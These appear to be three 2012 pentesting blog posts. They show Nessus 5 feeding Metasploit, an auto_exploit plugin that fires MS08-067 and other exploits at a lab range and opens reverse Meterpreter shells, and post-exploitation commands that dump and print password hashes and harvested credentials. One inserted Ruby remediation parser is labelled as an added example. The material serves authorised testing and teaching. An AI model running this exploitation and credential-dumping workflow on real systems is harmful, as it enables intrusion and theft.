
Thursday, Feb 16 2012

Nessus 5 Making My Pentesting Workflow Easier

With the recent release of Nessus 5 come several improvements: better filtering in policy creation, analysis and reporting, and a faster, lighter scanning engine. Of these new features my favorite is the ability to filter when creating new policies and when analyzing results. For a very long time I kept a hand-written list of plugin IDs that identified some of the most commonly found vulnerabilities that Metasploit covered, for use with nessuscmd in my engagements. Now the new filtering features let me select only those checks that cover vulnerabilities whose exploits are in exploit frameworks like Core Impact and CANVAS; one can also filter for remote or local exploits. In this blog post I will cover how to create a policy that covers all exploits found in Metasploit, both local and remote. We will start by logging in to the Nessus web interface and clicking on Policies.

[Screenshot: Screen Shot 2012-02-16 at 11.34.26 AM]

Once in Policies we click on Add to be brought to the following screen, where we can create one; we give the policy a name and a brief description and leave the rest at the defaults:


[Screenshot: Screen Shot 2012-02-16 at 11.35.51 AM]

We go to the next section by clicking on Next. On this screen we can enter any credentials we may have, including NTLM hashes for Windows credentials in the password field, which allows the enumeration of local vulnerabilities that might be present on the target:


[Screenshot: Screen Shot 2012-02-16 at 11.36.15 AM]

We now move to the plugin section by clicking on Next:

[Screenshot: Screen Shot 2012-02-16 at 11.36.29 AM]

We start by clicking on Disable All and then click on Add Filter to create a new filter for the plugins. We set the filter to Metasploit Exploit Framework, set the action to "is equal to" and the value to true, and then click on Save to apply the filter:

[Screenshot: Screen Shot 2012-02-16 at 11.36.54 AM]

To enable the plugins in each family we click on the family name text, being careful not to click on the circle beside the name, and then click on Enable Plugins at the top of the plugin list:

[Screenshot: Screen Shot 2012-02-16 at 11.37.14 AM]

Now we click on Next then on Save to save the policy.

Once saved we can use the nessus plugin from the console to connect to the scanner and use it from inside Metasploit. You can use the console in Armitage, MSFConsole or the one in Metasploit Community/Pro/Express to load the plugin:

msf > load nessus 
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus

Once the plugin is loaded we can connect to the host that is running the Nessus server using the nessus_connect command and list the policies we have available to us with nessus_policy_list:

msf > nessus_connect carlos:contasena@localhost ok
[*] Connecting to https://localhost:8834/ as carlos
[*] Authenticated
msf > nessus_policy_list 
[+] Nessus Policy List
[+] 
ID  Name                        Comments
--  ----                        --------
-1  External Network Scan       
-2  Internal Network Scan       
-3  Prepare for PCI DSS audits  
-4  Web App Tests               
6   Metasploit Exploits         

We can now use the policy to scan a network by giving the policy ID, a name for the scan and a target range to the nessus_scan_new command:

msf > nessus_scan_new 6 "contoso pentest" 192.168.1.1-241
[*] Creating scan from policy number 6, called "contoso pentest" and scanning 192.168.1.1-241
[*] Scan started.  uid is 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554

We can monitor the status of the scan using the command nessus_scan_status:

msf > nessus_scan_status 
[+] Running Scans
[+] 
Scan ID                                               Name             Owner   Started            Status   Current Hosts  Total Hosts
-------                                               ----             -----   -------            ------   -------------  -----------
396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554  contoso pentest  carlos  11:53 Feb 16 2012  running  217            241
[+] 
[*] You can:
[+]         Import Nessus report to database :     nessus_report_get <reportid>
[+]         Pause a nessus scan :             nessus_scan_pause <scanid>
msf >

Once we see that the scan is no longer running we can access the report from the scan using the nessus_report_list command to see its name and ID:

msf > nessus_report_list 
[+] Nessus Report List
[+] 
ID                                                    Name             Status     Date
--                                                    ----             ------     ----
396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554  contoso pentest  completed  11:58 Feb 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>

Now that we have the report ID we can import it, but before we do that we first create a workspace to house the data, so as to keep it separated from any other data we may already have in the Metasploit default workspace, and then use the nessus_report_get command to import the report:

msf > workspace -a contoso
[*] Added workspace: contoso
msf > nessus_report_get 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554
[*] importing 396a6c4f-e8ab-c752-6ee1-5bc3c13303df24456a407318b554
[*] 192.168.1.99
[*] 192.168.1.241
[*] 192.168.1.237
[*] 192.168.1.235
[*] 192.168.1.234
[*] 192.168.1.230
[*] 192.168.1.223
[*] 192.168.1.2
[*] 192.168.1.192
[*] 192.168.1.156
[*] 192.168.1.155
[*] 192.168.1.154
[*] 192.168.1.153
[*] 192.168.1.146
[*] 192.168.1.143
[*] 192.168.1.134
[*] 192.168.1.113
[*] 192.168.1.109
[*] 192.168.1.102
[*] 192.168.1.100
[*] 192.168.1.1
[+] Done

After the import you can look at the vulnerabilities found by using the vulns command:

msf > vulns
[*] Time: 2012-02-16 16:01:44 UTC Vuln: host=192.168.1.1 port=443 proto=tcp name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-02-16 16:01:37 UTC Vuln: host=192.168.1.2 port=111 proto=tcp name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-02-16 16:01:37 UTC Vuln: host=192.168.1.2 port=445 proto=tcp name=Microsoft Windows SMB Log In Possible refs=MSF-Microsoft Windows Authenticated User Code Execution,NSS-10394
[*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=445 proto=tcp name=MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) refs=CVE-2008-4250,BID-31874,OSVDB-49243,IAVA-2008-A-0081,MSFT-MS08-067,CWE-94,MSF-Microsoft Server Service Relative Path Stack Corruption,NSS-34477
[*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=53 proto=tcp name=Nessus SNMP Scanner refs=NSS-14274
[*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=445 proto=tcp name=Microsoft Windows SMB Log In Possible refs=MSF-Microsoft Windows Authenticated User Code Execution,NSS-10394
[*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.100 port=59159 proto=tcp name=netstat portscanner (SSH) refs=NSS-14272
[*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.102 port=62078 proto=tcp name=Nessus SYN scanner refs=NSS-11219
[*] Time: 2012-02-16 16:01:40 UTC Vuln: host=192.168.1.109 port=62078 proto=tcp name=Nessus SYN scanner refs=NSS-11219
.......
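The refs= field in each vulns line is where the value of the Nessus 5 filter shows up: an MSF- reference means a Metasploit module covers the finding. The following is an added example in Ruby (the language of the Metasploit plugins discussed here), not code from this post or from the auto_exploit plugin; it parses a constructed sample in the exact vulns format above and produces a per-host remediation-priority summary, putting hosts with unauthenticated, exploit-covered findings first. The "uncredentialed check" name heuristic and all function names are this example's own assumptions.

```ruby
# Constructed sample input in the format of the `vulns` output shown above.
SAMPLE_VULNS = <<~'OUT'
  [*] Time: 2012-02-16 16:01:44 UTC Vuln: host=192.168.1.1 port=443 proto=tcp name=Nessus SYN scanner refs=NSS-11219
  [*] Time: 2012-02-16 16:01:37 UTC Vuln: host=192.168.1.2 port=445 proto=tcp name=Microsoft Windows SMB Log In Possible refs=MSF-Microsoft Windows Authenticated User Code Execution,NSS-10394
  [*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=445 proto=tcp name=MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check) refs=CVE-2008-4250,BID-31874,OSVDB-49243,IAVA-2008-A-0081,MSFT-MS08-067,CWE-94,MSF-Microsoft Server Service Relative Path Stack Corruption,NSS-34477
  [*] Time: 2012-02-16 16:01:32 UTC Vuln: host=192.168.1.99 port=53 proto=tcp name=Nessus SNMP Scanner refs=NSS-14274
OUT

# One vulns line: the name may contain spaces, so it is matched non-greedily up
# to the final " refs=" field, which runs to the end of the line.
VULN_LINE = /\A\[\*\] Time: (?<time>.+? UTC) Vuln: host=(?<host>\S+) port=(?<port>\d+) proto=(?<proto>\S+) name=(?<name>.*?) refs=(?<refs>.*)\z/

# Parse every well-formed line into a hash; refs are grouped by their prefix
# (NSS, MSF, CVE, BID, ...) so "MSFT-MS08-067" keeps its inner dash intact.
def parse_vulns(text)
  text.each_line.map do |line|
    m = VULN_LINE.match(line.chomp)
    next unless m
    refs = {}
    m[:refs].split(',').each do |ref|
      prefix, value = ref.split('-', 2)
      (refs[prefix] ||= []) << value
    end
    { time: m[:time], host: m[:host], port: m[:port].to_i,
      proto: m[:proto], name: m[:name], refs: refs }
  end.compact
end

# A finding is exploit-covered when Nessus attached an MSF- reference, i.e. a
# Metasploit module targets it; these are what the policy built above selects.
def exploit_covered(vulns)
  vulns.select { |v| v[:refs].key?('MSF') }
end

# Heuristic (assumption): Nessus names checks that needed no credentials with
# "(uncredentialed check)"; those are reachable without a foothold.
def unauthenticated?(vuln)
  vuln[:name].include?('uncredentialed check')
end

# Per-host summary, most urgent host first: unauthenticated exploit-covered
# findings outrank credentialed ones, then more module coverage ranks higher.
def priority_report(vulns)
  rows = exploit_covered(vulns).group_by { |v| v[:host] }.map do |host, findings|
    { host: host,
      unauth: findings.count { |v| unauthenticated?(v) },
      modules: findings.flat_map { |v| v[:refs]['MSF'] }.uniq,
      cves: findings.flat_map { |v| v[:refs].fetch('CVE', []) }.uniq,
      ports: findings.map { |v| "#{v[:port]}/#{v[:proto]}" }.uniq }
  end
  rows.sort_by { |r| [-r[:unauth], -r[:modules].size, r[:host]] }
end

# Human-readable lines for a patching ticket or a scan debrief.
def format_report(rows)
  rows.map do |r|
    cves = r[:cves].empty? ? 'none' : r[:cves].join(' ')
    "#{r[:host]} (#{r[:ports].join(', ')}): #{r[:modules].size} module(s), " \
      "#{r[:unauth]} unauthenticated, CVEs: #{cves}"
  end
end

if __FILE__ == $PROGRAM_NAME
  puts format_report(priority_report(parse_vulns(SAMPLE_VULNS)))
end
```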

Once we confirm that vulnerabilities were found we can use the auto_exploit plugin I wrote and updated for this blog post. It can be found at https://github.com/darkoperator/Metasploit-Plugins/blob/master/auto_exploit.rb; you just need to put a copy of it in ~/.msf4/plugins on your OS X/Linux host to be able to use it. We start by loading it and looking at the options of the vuln_exploit command, which will allow us to exploit the hosts found to be vulnerable:

msf > load auto_exploit 
[*] auto_exploit plug-in loaded.
[*] Successfully loaded plugin: auto_exploit
msf > vuln_exploit -h
OPTIONS:
    -f <opt>  Provide a comma separated list of IP's and Ranges to skip when running exploits.
    -h        Command Help
    -j <opt>  Max number of concurrent jobs, 3 is the default.
    -m        Only show matched exploits.
    -r <opt>  Minimum Rank for exploits (low, average,normal,good,great and excellent) good is the default.
    -s        Do not limit number of sessions to one per target.

To launch the exploits found we just use the vuln_exploit command. This will analyze the vulnerabilities found and match them to modules in the framework, launching by default 3 exploits at a time, auto-configured with the best possible payload for the platform and limited to one session per host:

msf > vuln_exploit
[*] Generating List for Matching...
[*] Matching Exploits (This will take a while depending on number of hosts)...
[+] Matched Exploits:
[+]     192.168.1.153 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.113 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.99 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.192 exploit/windows/smb/ms08_067_netapi 445 500
[+]     192.168.1.153 exploit/windows/dcerpc/ms03_026_dcom 135 500
[+]     192.168.1.154 exploit/linux/samba/lsa_transnames_heap 445 400
[+]     192.168.1.113 exploit/windows/smb/ms06_040_netapi 445 400
[+]     192.168.1.153 exploit/windows/smb/ms04_011_lsass 445 400
[+]     192.168.1.153 exploit/windows/smb/ms06_040_netapi 445 400
[+]     192.168.1.153 exploit/windows/smb/ms05_039_pnp 445 400
[+]     192.168.1.153 exploit/windows/smb/ms04_007_killbill 445 100
[*] Running Exploits:
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.153
[*] Started reverse handler on 192.168.1.241:29271 
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.113
[*] Automatically detecting the target...
[*] Started reverse handler on 192.168.1.241:4643 
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.99
[*] Started reverse handler on 192.168.1.241:14900 
[*] Automatically detecting the target...
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Fingerprint: Windows 2000 - Service Pack 4 with MS05-010+ - lang:English
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.99
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.153
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.113
[*] waiting for finishing some modules... active jobs: 3 / threads: 16
[*] Meterpreter session 1 opened (192.168.1.241:14900 -> 192.168.1.99:1513) at 2012-02-16 12:54:23 -0400
[*] Meterpreter session 2 opened (192.168.1.241:29271 -> 192.168.1.153:2709) at 2012-02-16 12:54:23 -0400
[*] Meterpreter session 3 opened (192.168.1.241:4643 -> 192.168.1.113:4035) at 2012-02-16 12:54:23 -0400
[*] waiting for finishing some modules... active jobs: 0 / threads: 19
[*] Running exploit/windows/smb/ms08_067_netapi against 192.168.1.192
[+]     Skipping 192.168.1.153 exploit/windows/dcerpc/ms03_026_dcom because a session already exists.
[*] Started reverse handler on 192.168.1.241:15430 
[*] Running exploit/linux/samba/lsa_transnames_heap against 192.168.1.154
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[+]     Skipping 192.168.1.113 exploit/windows/smb/ms06_040_netapi because a session already exists.
[*] Started reverse handler on 192.168.1.241:48452 
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms04_011_lsass because a session already exists.
[*] Creating nop sled....
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms06_040_netapi because a session already exists.
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms05_039_pnp because a session already exists.
[+]     Skipping 192.168.1.153 exploit/windows/smb/ms04_007_killbill because a session already exists.
[*] Trying to exploit Samba with address 0xffffe410...
[*] Connecting to the SMB service...
[*] Attempting to trigger the vulnerability...
msf > [*] Sending stage (752128 bytes) to 192.168.1.192
[*] Meterpreter session 4 opened (192.168.1.241:15430 -> 192.168.1.192:1597) at 2012-02-16 12:54:29 -0400

We can now take a look at the sessions obtained using the sessions command:

msf > sessions 
Active sessions
===============
  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ CARLOS-CD652C1C  192.168.1.241:14900 -> 192.168.1.99:1513
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN2KADV01       192.168.1.241:29271 -> 192.168.1.153:2709
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ TEST-01BCDAF47C  192.168.1.241:4643 -> 192.168.1.113:4035
  4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DBSQL2K01        192.168.1.241:15430 -> 192.168.1.192:1597

As you can see, the mix of the new filtering in Nessus 5 with the Nessus plugin and my auto_exploit plugin allows one to be less noisy and more tactical when it comes to exploitation. Hope you found this blog post informative and useful as always.

Monday, Jan 30 2012

Tip on Using My GitHub Repos

I was recently asked what would be the best way to use my Metasploit projects in an easy manner, so I will share how I did my setup on both OS X and BackTrack for using my plugins and modules. Let's start by creating a Development folder in the user's home directory to house the GitHub repos:

mkdir ~/Development

After this you can clone the repos in to this folder:

cd ~/Development
git clone https://github.com/darkoperator/Metasploit-Plugins.git msf_plugins
git clone https://github.com/darkoperator/Meterpreter-Scripts.git msf_modules

Now we can link the checked-out directories into our ~/.msf4 directory so we can use them transparently with any instance of the framework we might be running on the machine:

ln -s ~/Development/msf_plugins/ ~/.msf4/plugins
ln -s ~/Development/msf_modules/ ~/.msf4/modules

To keep them updated, a simple git pull in each directory gets the latest changes and bug fixes.

Sunday, Jan 29 2012

Metasploit Pentest Plugin Part 2

This is the second part of my Pentest Metasploit plugin series. This part will cover the post-exploitation commands this plugin adds. First I would like to cover the thought process behind these commands. The commands came from some modules I pushed to, and then had to pull from, the Metasploit Framework around summer of 2011; sadly they did not comply with some of the rules on what modules were supposed to do, and the post mixin did not allow me to do what I wanted. I created a Metasploit plugin that added the functionality of those modules to the console; the initial plugin is called auto post and can be found in my GitHub account at https://github.com/darkoperator/Metasploit-Plugins. Several of the main design decisions I took when developing this section of the pentest plugin were:

  • Provide a way to run post modules where I could select the sessions to run the modules against.
  • Do not pollute the datastore with global variables, as would be needed with a resource file.
  • Check that the session is a compatible one before running the module.
  • Allow the automation of some of the most common tasks, like password collection from applications and the OS user credentials.
  • Allow the setting of several variables per module in a resource file in an easy manner, so each module can be executed in a way that produces the best results.

To use the plugin you only need to download it from my GitHub account and place it in either ~/.msf4/plugins or in the plugins directory of your Metasploit root folder. Sadly, at the time of this writing, tab completion when loading the plugin will only work if the plugin is in the Metasploit plugins folder of the install and not in the hidden home folder.

Sessions that will be used for showing the plugin usage:

msf  exploit(handler) > sessions -l

Active sessions
===============

Id  Type                   Information                                      Connection
--  ----                   -----------                                      ----------
1   shell linux                                                             192.168.1.100:4448 -> 192.168.1.229:47760
2   meterpreter x86/win32  TEST-01BCDAF47C\Administrator @ TEST-01BCDAF47C  192.168.1.100:4444 -> 192.168.1.113:1858
3   meterpreter x86/win32  WIN-YR4V852V71Y\Administrator @ WIN-YR4V852V71Y  192.168.1.100:4444 -> 192.168.1.156:49183
4   shell windows          Microsoft Windows [Version 6.1.7601]             192.168.1.100:4447 -> 192.168.1.225:49582
5   shell linux                                                             192.168.1.100:4448 -> 192.168.1.119:33595

Loading the plugin:

msf  exploit(handler) > load pentest 
postauto plugin loaded.
[*] Successfully loaded plugin: pentest

The post-exploitation commands added are:

Postauto Commands
=================

    Command             Description
    -------             -----------
    app_creds           Run application password collection modules against specified sessions.
    multi_cmd           Run shell command against several sessions
    multi_meter_cmd     Run a Meterpreter Console Command against specified sessions.
    multi_meter_cmd_rc  Run resource file with Meterpreter Console Commands against specified sessions.
    multi_post          Run a post module against specified sessions.
    multi_post_rc       Run resource file with post modules and options against specified sessions.
    sys_creds           Run system password collection modules against specified sessions.

Let's take a look at the app_creds command. This command will run all post-exploitation modules that gather credentials from installed applications. First let's take a look at the options it provides:

msf  exploit(handler) > app_creds -h

OPTIONS:

    -h        Command Help
    -s <opt>  Sessions to run modules against. Example <all> or <1,2,3,4>

The options are quite simple: we can tell it which sessions to run against as a comma-separated list, or just type 'all' to have it run against every session. Let's run it against all the current sessions:

msf > app_creds -s all

Running windows/gather/credentials/wsftp_client against 2

[*] Checking Default Locations...
[*] C:\Documents and Settings\Administrator\Application Data\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Documents and Settings\Administrator\Application Data\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....

Running windows/gather/credentials/wsftp_client against 3
[*] Checking Default Locations...
[*] C:\Users\charlie\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Users\charlie\AppData\Roaming\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini not found ....
[*] C:\Users\Administrator\AppData\Roaming\Ipswitch\WS_FTP Home\Sites\ws_ftp.ini not found ....

Running windows/gather/credentials/winscp against 2
[*] Looking for WinSCP.ini file storage...
[*] WinSCP.ini file NOT found...
[*] Looking for Registry Storage...
[*] No WinSCP Registry Keys found!
[*] Done!

Running windows/gather/credentials/winscp against 3
[*] Looking for WinSCP.ini file storage...
[*] WinSCP.ini file NOT found...
[*] Looking for Registry Storage...
[*] No WinSCP Registry Keys found!
[*] Done!
………

Running multi/gather/filezilla_client_cred against 4
[*] No users found with a FileZilla directory

Running multi/gather/filezilla_client_cred against 5
[*] Checking for FileZilla Client profile in: /home/carlos
[*] Checking for FileZilla Client profile in: /home/lost+found
[*] Checking for FileZilla Client profile in: /root
[*] No users found with a FileZilla directory

The command runs each module sequentially against the selected sessions, and the output of each module is shown as it executes. The credential-harvesting post modules save their results in the credentials table; to look at them just issue the creds command. The target hosts for these credentials are also stored in the hosts table:

msf  exploit(handler) > creds

Credentials
===========

host          port  user    pass      type      active?
----          ----  ----    ----      ----      -------
1.1.1.1       21    carlos  marta     password  true
10.10.1.1     21    test    tessqwwe  password  true
10.10.10.10   21    msf     test      password  true
10.10.10.100  22    test    resroass  password  true
192.168.1.1   21    msf     test      password  true

[*] Found 5 credentials.
msf  exploit(handler) > hosts 

Hosts
=====

address        mac  name             os_name            os_flavor  os_sp  purpose  info  comments
-------        ---  ----             -------            ---------  -----  -------  ----  --------
1.1.1.1                                                                                  
10.10.1.1                                                                                
10.10.10.10                                                                              
10.10.10.100                                                                             
192.168.1.1                                                                              
192.168.1.115       CARLOS-192FCD91  Microsoft Windows  XP         SP3    client

The next command for gathering information is sys_creds. This command chooses the appropriate credential dumping module depending on the session type and OS; in the case of Windows systems it will attempt to get SYSTEM privilege to be able to dump the hashes. These too can be found in the creds table and in loot. Options:

msf  exploit(handler) > sys_creds -h

OPTIONS:

    -h        Command Help
    -s <opt>  Sessions to run modules against. Example <all> or <1,2,3,4>

Running the command:

msf  exploit(handler) > sys_creds -s all

...

Running windows/gather/smart_hashdump against 1
[*] Running module against CARLOS-192FCD91
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /Users/carlos/.msf4/loot/20120125082528_default_192.168.1.115_windows.hashes_690213.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM privilege
[+] Got SYSTEM privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY f228f68360a9fbdd929f311d27192e90...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392:::
[+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e:::
[+]     HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

Running windows/gather/smart_hashdump against 2
[*] Running module against TEST-01BCDAF47C
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /Users/carlos/.msf4/loot/20120125082534_default_192.168.1.113_windows.hashes_233919.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM privilege
[+] Got SYSTEM privilege
[*]     Obtaining the boot key...
[*]     Calculating the hboot key using SYSKEY 4503ffd18cd3ee70d443b159c8626842...
[*]     Obtaining the user list and keys...
[*]     Decrypting user keys...
[*]     Dumping password hashes...
[+]     Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203:::
[+]     HelpAssistant:1000:17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2:::
[+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63:::

Running linux/gather/hashdump against 3
[+] root:$1$1lQhcdo0$QpqLgMYl1r4nerxr9GQDn0:0:0:root:/root:/bin/bash
[+] nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
[+] vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
[+] oprofile:!!:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
[+] pcap:!!:77:77::/var/arpwatch:/sbin/nologin
[+] ntp:!!:38:38::/etc/ntp:/sbin/nologin
[+] dbus:!!:81:81:System message bus:/:/sbin/nologin
[+] avahi:!!:70:70:Avahi daemon:/:/sbin/nologin
[+] rpc:!!:32:32:Portmapper RPC user:/:/sbin/nologin
[+] apache:!!:48:48:Apache:/var/www:/sbin/nologin
[+] mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
[+] smmsp:!!:51:51::/var/spool/mqueue:/sbin/nologin
[+] sshd:!!:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
[+] xfs:!!:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
[+] rpcuser:!!:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
[+] nfsnobody:!!:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
[+] haldaemon:!!:68:68:HAL daemon:/:/sbin/nologin
[+] gdm:!!:42:42::/var/gdm:/sbin/nologin
[+] carlos:$1$1lQhcdo0$QpqLgMYl1r4nerxr9GQDn0:500:500:Carlos Perez:/home/carlos:/bin/bash
[+] Unshadowed Password File: /Users/carlos/.msf4/loot/20120125082541_default_192.168.1.119_linux.hashes_102504.txt

Running linux/gather/hashdump against 4
[-] You must run this module as root!

Looking at the gathered info with creds and then loot, since system hashes are saved in both:

msf  exploit(handler) > creds

Credentials
===========

host           port  user              pass                                                               type      active?
----           ----  ----              ----                                                               ----      -------
...
192.168.1.113  445   HelpAssistant     17520fb9c159a6be8a692d4f186288a5:4ad260d25ad790417f1a4ef3c44103b2  smb_hash  true
192.168.1.113  445   Administrator     bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203  smb_hash  true
192.168.1.113  445   SUPPORT_388945a0  aad3b435b51404eeaad3b435b51404ee:ec48ef68e471506ab31f656bf5741d63  smb_hash  true
192.168.1.115  445   HR                44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4  smb_hash  true
192.168.1.115  445   SUPPORT_388945a0  aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e  smb_hash  true
192.168.1.115  445   HelpAssistant     4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392  smb_hash  true
192.168.1.115  445   Administrator     bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203  smb_hash  true

[*] Found 12 credentials.
msf  exploit(handler) > loot

Loot
====

host           service  type                          name                              content     info                                path
----           -------  ----                          ----                              -------     ----                                ----
192.168.1.113           windows.hashes                TEST-01BCDAF47C_hashes.txt        text/plain  Windows Hashes                      /Users/carlos/.msf4/loot/20120125082534_default_192.168.1.113_windows.hashes_233919.txt
192.168.1.115           windows.hashes                CARLOS-192FCD91_hashes.txt        text/plain  Windows Hashes                      /Users/carlos/.msf4/loot/20120125082528_default_192.168.1.115_windows.hashes_690213.txt
192.168.1.115           ie.cookies                    ie_cookies.txt                    text/plain  Internet Explorer Cookies           /Users/carlos/.msf4/loot/20120125081022_default_192.168.1.115_ie.cookies_091073.txt
192.168.1.115           ie.history                    ie_history.txt                    text/plain  Internet Explorer Browsing History  /Users/carlos/.msf4/loot/20120125081022_default_192.168.1.115_ie.history_338823.txt
192.168.1.115           windows.autologin.user.creds  windows-autologin-user-creds.csv  text/csv    Windows AutoLogin User Credentials  /Users/carlos/.msf4/loot/20120125080927_default_192.168.1.115_windows.autologi_357557.csv
192.168.1.115           imail.user.creds              imail_user_creds.csv              text/csv    Ipswitch iMail user credentials     /Users/carlos/.msf4/loot/20120125080951_default_192.168.1.115_imail.user.creds_495255.csv
192.168.1.119           linux.hashes                  unshadowed_passwd.pwd             text/plain  Linux Unshadowed Password File      /Users/carlos/.msf4/loot/20120125082541_default_192.168.1.119_linux.hashes_102504.txt
192.168.1.119           linux.passwd                  passwd.tx                         text/plain  Linux Passwd File                   /Users/carlos/.msf4/loot/20120125082541_default_192.168.1.119_linux.passwd_327705.txt
192.168.1.119           linux.shadow                  shadow.tx                         text/plain  Linux Password Shadow File          /Users/carlos/.msf4/loot/20120125082541_default_192.168.1.119_linux.shadow_914385.txt

The next command in the list is multi_post. This command allows running a specified post module against a list of sessions or against all sessions. The command checks that the options provided are correct during execution and that the module is compatible with the session before executing. Recently, tab completion for the module name was added. The options are:

msf > multi_post -h

OPTIONS:

    -h        Command Help
    -m <opt>  Module to run against sessions.
    -o <opt>  Module options.
    -s <opt>  Sessions to run module against. Example <all> or <1,2,3,4>

Let's run the checkvm modules for Windows and Linux; in the output you will be able to see that each module only executed against those sessions it was compatible with:

msf > multi_post -m post/windows/gather/checkvm -s all
Loading windows/gather/checkvm
Running against 2

[*] Checking if CARLOS-192FCD91 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
Running against 3
[*] Checking if TEST-01BCDAF47C is a Virtual Machine .....
[*] This is a VMware Virtual Machine
Running against 4
[*] Checking if WINDEV01 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
msf > multi_post -m post/linux/gather/checkvm -s all
Loading linux/gather/checkvm
Running against 6

[*] Gathering System info ....
[+] This appears to be a VMware Virtual Machine
Running against 7
[*] Gathering System info ....
[+] This appears to be a VMware Virtual Machine

The other multi_post command allows running modules against multiple sessions with options using a resource file. This lets you keep several resource files with options pre-set for specific tasks; tab completion can be used for the resource file name:

msf > multi_post_rc -h

OPTIONS:

    -h         Command Help
    -rc <opt>  Resource file with space separate values <session> <module> <options>, per line.

The RC File:

msf > cat /tmp/checkvm.rc
[*] exec: cat /tmp/checkvm.rc

all post/windows/gather/checkvm
all post/linux/gather/checkvm

Running the RC file:

msf > multi_post_rc -rc /tmp/checkvm.rc 
all post/windows/gather/checkvm
Loading post/windows/gather/checkvm
Running Against 2

[*] Checking if CARLOS-192FCD91 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
Running Against 3
[*] Checking if TEST-01BCDAF47C is a Virtual Machine .....
[*] This is a VMware Virtual Machine
Running Against 4
[*] Checking if WINDEV01 is a Virtual Machine .....
[*] This is a VMware Virtual Machine
all post/linux/gather/checkvm
